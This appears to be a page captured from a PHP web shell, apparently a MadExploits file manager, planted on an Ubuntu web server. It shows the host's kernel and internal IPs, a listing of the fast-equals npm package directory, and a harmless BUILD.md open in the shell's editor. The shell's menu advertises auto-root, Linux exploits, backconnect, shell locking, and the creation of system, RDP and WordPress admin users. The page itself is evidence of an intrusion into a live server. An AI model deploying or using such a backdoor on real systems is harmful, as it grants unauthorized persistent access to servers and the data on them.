Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
fast-equals /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
recipes
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.babelrc
470
B
-rw-r--r--
.prettierrc
138
B
-rw-r--r--
.release-it.beta.json
270
B
-rw-r--r--
.release-it.json
210
B
-rw-r--r--
BUILD.md
748
B
-rw-r--r--
CHANGELOG.md
12.71
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
README.md
17.71
KB
-rw-r--r--
index.d.ts
7.81
KB
-rw-r--r--
package.json
3.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BUILD.md
# Reproducing a build ## Clone version ``` git clone https://github.com/planttheidea/fast-equals.git cd fast-equals git checkout {version} ``` Replace `{version}` above with the appropriate package version. If you want to compare a version older than `1.6.2`, you'll need to use a commit hash directly. ## Install ``` yarn install ``` We use `yarn` for our package management, so to ensure that exact dependencies you should also use it. ## Build artifacts ``` yarn run build ``` **NOTE**: To get an exact checksum match with the versions released on npm, it may be necessary to change line endings. For example, on Linux you might run: ``` unix2dos dist/fast-equals.min.js ``` ## Get checksum ``` sha256sum dist/fast-equals.min.js ```
Close